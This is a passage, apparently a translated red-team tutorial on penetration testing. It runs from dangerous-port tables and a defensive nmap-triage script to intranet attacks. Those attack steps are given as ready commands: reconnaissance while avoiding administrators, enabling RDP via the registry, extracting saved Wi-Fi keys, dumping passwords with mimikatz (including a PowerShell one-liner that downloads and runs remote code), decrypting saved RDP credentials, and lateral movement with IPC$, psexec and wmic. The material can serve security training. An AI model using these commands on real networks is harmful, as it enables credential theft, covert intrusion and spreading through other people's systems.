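        rdata = bytes(int(octet) for octet in addr.split("."))
        # 0xC00C is a pointer to offset 12: reuse the question name as the owner name
        rrs += b"\xC0\x0C" + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4) + rdata
    return header + question + rrs


def parse_answers(msg: bytes) -> List[Tuple[str, str, int]]:
    """Return (owner, IPv4, ttl) for every A record in the answer section."""
    hdr = parse_header(msg)
    offset = 12
    for _ in range(hdr["counts"]["QUERY"]):  # skip the question section
        _, offset = decode_name(msg, offset)
        offset += 4
    records = []
    for _ in range(hdr["counts"]["ANSWER"]):
        owner, offset = decode_name(msg, offset)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata, offset = msg[offset:offset + rdlen], offset + rdlen
        if rtype == TYPE_A and rdlen == 4:
            records.append((owner, ".".join(str(b) for b in rdata), ttl))
    return records
```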

Fingerprint information

Information-leak collection

SVN leak

File leak

git leak

robots.txt leak

┌──(root💀B)-[~]
└─# curl www.dansemal.cn/robots.txt
User-agent: *
Allow: /

Sitemap: https://www.dansemal.cn/sitemap.xml

Dangerous-port inventory

Web (web vulnerabilities / sensitive directories)

Third-party component vulnerabilities: struts, thinkphp, jboss, ganglia, zabbix
80 web
80-89 web
8000-9090 web

Databases (scan for weak passwords)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

Special services (unauthenticated access / command execution / vulnerabilities)

443 SSL Heartbleed
873 Rsync unauthenticated access
5984 CouchDB http://xxx:5984/_utils/
6379 Redis unauthenticated access
7001,7002 WebLogic default weak password, deserialization
9200,9300 Elasticsearch, see WooYun: command execution vulnerability on a Duowan ElasticSearch server
11211 memcache unauthenticated access
27017,27018 MongoDB unauthenticated access
50000 SAP command execution
50070,50030 Hadoop default ports, unauthenticated access

Commonly used ports (weak-password scanning / port brute force)

21 FTP
22 SSH
23 Telnet
2601,2604 zebra routing, default password zebra
3389 Remote Desktop

Full port list

21 FTP
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL Heartbleed and other web vulnerability testing
445 SMB

512,513,514 Rexec
873 Rsync unauthenticated access
1025,111 NFS
1433 MSSQL
1521 Oracle (iSqlPlus ports: 5560, 7778)
2082/2083 cPanel hosting control panel login (common abroad)
2222 DA (DirectAdmin) hosting control panel login (common abroad)
2601,2604 zebra routing, default password zebra
3128 squid proxy default port; with no password set it very likely gives direct access to roam the internal network
3306 MySQL
3312/3311 kangle hosting control panel login
3389 Remote Desktop
4440 rundeck, see WooYun: roaming Sina's internal network via one of its services
5432 PostgreSQL
5900 VNC
5984 CouchDB http://xxx:5984/_utils/
6082 varnish, see WooYun: unauthenticated access to the Varnish HTTP accelerator CLI can easily lead to direct site tampering or to use as a proxy into the internal network
6379 Redis unauthenticated access
7001,7002 WebLogic default weak password, deserialization
7778 Kloxo hosting control panel login
8000-9090 all common web ports; some operators like to put the admin back end on these non-80 ports
8080 Tomcat / WDCP hosting control panel, default weak password
8080,8089,9090 JBoss
8083 VestaCP hosting control panel (common abroad)
8649 ganglia
8888 AMH / LuManager hosting control panel default port
9200,9300 Elasticsearch, see WooYun: command execution vulnerability on a Duowan ElasticSearch server
10000 Virtualmin/Webmin virtual hosting control panel
11211 memcache unauthenticated access
27017,27018 MongoDB unauthenticated access
28017 MongoDB statistics page
50000 SAP command execution
50070,50030 Hadoop default ports, unauthenticated access
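
Added example (not from the original notes): parse the PORT/STATE/SERVICE/VERSION rows from nmap output like the scan shown earlier and map the open ports onto the risk groups of the tables above, the way a defender would triage a scan of their own hosts. The sample scan is constructed around the 22/tcp line from that output, RISK_GROUPS is a subset of the page's lists, and the function names are my own.

```python
import re
from typing import Dict, List, NamedTuple

PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)


class Service(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


# Risk groups lifted from the port tables above (a subset). A port is only a hint:
# the service behind it still has to be confirmed from the VERSION column.
RISK_GROUPS: Dict[str, set] = {
    "database (weak-password exposure)": {1433, 1521, 3306, 5432},
    "unauthenticated access / RCE service": {873, 5984, 6379, 7001, 7002, 9200, 9300,
                                             11211, 27017, 27018, 50000, 50070, 50030},
    "remote login (brute-force target)": {21, 22, 23, 2601, 2604, 3389, 5900},
    "web / admin panel": set(range(80, 90)) | {443, 10000} | set(range(8000, 9091)),
}

# Constructed sample: the 22/tcp row from the scan above plus invented rows.
SAMPLE_SCAN = """\
Nmap scan report for localhost (127.0.0.1)
Not shown: 65529 closed ports
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 95:24:8a:70:02:c1:7c:b9:63:1d:57:bd:c4:ba:59:84 (RSA)
445/tcp   filtered microsoft-ds
3306/tcp  open     mysql         MySQL 5.7.33
6379/tcp  open     redis         Redis key-value store 6.0.9
8080/tcp  open     http          Apache Tomcat 9.0.41
11211/tcp open     memcache
"""


def parse_nmap_ports(text: str) -> List[Service]:
    """Extract the PORT/STATE/SERVICE/VERSION rows from nmap's normal (-oN) output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            services.append(Service(int(m["port"]), m["proto"], m["state"],
                                    m["service"], (m["version"] or "").strip()))
    return services


def classify(services: List[Service]) -> Dict[str, List[Service]]:
    """Map each open service to the risk groups its port falls in (a port may hit several)."""
    findings: Dict[str, List[Service]] = {}
    for svc in services:
        if svc.state != "open":  # filtered/closed ports are not reachable exposure
            continue
        for group, ports in RISK_GROUPS.items():
            if svc.port in ports:
                findings.setdefault(group, []).append(svc)
    return findings


def unversioned(services: List[Service]) -> List[Service]:
    """Open services nmap could not version: verify these by hand before trusting the port hint."""
    return [s for s in services if s.state == "open" and not s.version]
```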

Internal network information gathering

Concept of internal information gathering

An internal network (intranet) is a network covering one area, also called a local area network; it is not exposed to the Internet. Intranets come in several kinds, such as server networks and office networks. An intranet makes data transfer convenient and keeps the data protected, and its assets are no fewer than those exposed on the external network, so internal information gathering is also very important.

For a red team, the prerequisite for breaking through an intranet is internal information gathering. Internal assets are spread very widely: not only web services but all kinds of dangerous open ports, and machines on the intranet are not guaranteed to have a firewall enabled, so we can move laterally at will. Suppose a large number of intranet machines are missing the MS17-010 patch: then we can traverse the whole intranet.

On the other hand, even if the intranet is well secured, once we have collected passwords we can try them elsewhere (credential stuffing) to test whether a password has been reused, which can also compromise other hosts.

  • Staying covert during internal gathering

Before collecting internal information, we need to check the administrator's login times.

net user administrator                          // check the last logon time
wevtutil epl security C:\System_log.evtx        // export the whole Security event log

ipconfig /all                                   query local IP details and whether there are multiple NICs
net user                                        how many local accounts exist
query user                                      users currently logged on
tasklist /v                                     list all running processes
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"   query the OS version (field names of a Chinese-locale Windows)
systeminfo                                      installed hotfixes
net share                                       shared resources
netsh firewall show config                      firewall configuration
net statistics workstation                      boot time
wmic product get name,version                   installed software
net session                                     sessions
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f    enable remote RDP
net config workstation                          check whether the host is in a domain
netsh wlan show profiles                        Wi-Fi networks the host has connected to


netsh
wlan
show profiles
show profiles name="" key=clear                 show the saved password

RDP connection history
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s


Privilege escalation on an internal host
systeminfo

Copy the output to https://i.hacking8.com/tiquan

Internal host discovery and scanning

Pivoting: traffic proxying

  • Proxying traffic out means exposing the target machine's internal network to our own machine through a proxy and then scanning through it. The proxies used for this are mostly SOCKS5 or SOCKS4. There are many traffic-proxy tools; personally I find frp the best and most stable.
  • Internal traffic forwarding


Estimating the size of the internal network
  • We can use arp -a to get an overview of the network segment
  • Private IP addresses fall into the 10, 172 and 192 ranges, listed here from largest to smallest
  • Class A addresses
10.0.0.0--10.255.255.255
  • Class B addresses
172.16.0.0--172.31.255.255
  • Class C addresses
192.168.0.0--192.168.255.255

Internal host liveness detection
Use ping or nmap.
Once the traffic is proxied out, proxychains can be used to run nmap against the internal network.

NTscan
For brute-forcing on the internal network

Internal weak passwords
Note down vulnerable assets
Internal traffic sniffing

Collecting passwords from internal hosts

Dumping local passwords with mimikatz

mimikatz is a simple and effective Windows password-dumping tool that lets the user grab Windows passwords with a single command; it is easy to operate and use.
Another instructor will cover some advanced uses of mimikatz in the domain-penetration part; only a brief introduction is given here.

mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit	read local passwords

powershell "IEX (New-Object Net.WebClient).DownloadString(' ');Invoke-Mimikatz -DumpCreds" // PowerShell variant

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"
Recovering saved RDP connection passwords with mimikatz

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
privilege::debug
dpapi::cred /in:C:\Users\A\AppData\Local\Microsoft\Credentials\CA881006071CB1238C13640450A5B676
look up the guidMasterKey
sekurlsa::dpapi
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\8781378F7D47006A4FC98D2F8A266F58
/masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d

Lateral movement on the internal network

IPC null sessions: overview

IPC$ (Internet Process Connection) is a resource that shares "named pipes".

It is a named pipe opened for inter-process communication; by supplying a trusted username and password, the connection establishes a secure channel and exchanges encrypted data over it, thereby gaining access to the remote computer.

IPC$ is a feature introduced in NT/2000 with one characteristic: at any one time only a single connection is allowed between two IP addresses. Along with IPC$, NT/2000 also enables default shares at first installation, i.e. all logical drives (C$, D$, ...) and the system directory winnt or windows (ADMIN$). Microsoft's intent in all of this was to make administration convenient, but intentionally or not it lowered the security of the system.

Commands for establishing a null session

net share                                        list local shares
net use \\<IP> "<password>" /user:<username>     establish the connection to the host
net use \\<IP> /del                              remove the connection
net time \\<IP>                                  show the remote machine's time

psexec: lateral-movement tool

A remote command-line tool provided by Microsoft;
it can be used directly to run commands interactively on a remote host.
psexec.exe -accepteula \\IP -u domain\administrator -p password command

wmic: lateral movement

wmic is a toolset that ships with Windows.
wmic /node:192.168.200.10 /user:jack /password:a    # append the wmic command after the connection options
process call create "cmd.exe"                        # start a program

process list brief                                   # list all processes